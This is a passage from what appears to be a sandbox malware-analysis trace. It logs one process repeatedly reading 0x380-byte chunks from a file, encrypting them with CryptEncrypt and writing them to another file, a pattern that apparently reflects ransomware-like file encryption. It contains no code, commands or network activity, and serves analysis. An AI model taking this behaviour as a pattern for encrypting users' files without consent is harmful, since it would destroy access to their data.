lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.408] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.408] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.408] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.408] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.408] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.408] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.408] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.408] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.408] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.408] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.409] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.409] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.409] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.409] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.409] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.409] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.409] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.409] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.409] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.409] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.409] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.409] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.409] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.409] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.409] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.409] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.409] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.410] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.410] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.410] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.410] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.410] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.411] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.411] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.411] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.411] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.411] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.411] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.411] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.411] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.411] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.411] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.411] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.411] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.411] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.411] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.411] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.411] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.411] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.411] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.412] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.412] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.412] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.412] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.412] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.412] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.412] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.412] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.412] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.412] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.412] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.412] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.412] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.412] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.412] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.412] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.412] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.413] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.413] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.413] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.413] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.413] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.413] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.413] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.413] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.413] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.413] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.413] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.413] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.413] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.413] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.413] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.413] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.413] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.413] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.414] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.414] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.414] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.414] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.414] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.414] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.414] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.414] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.414] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.414] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.414] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.414] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.414] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.414] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.414] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.414] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.414] ReadFile (in: hFile=0x5d64, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0258.415] CryptEncrypt (in: hKey=0x2e7fd40, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0258.415] WriteFile (in: hFile=0x5d50, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, 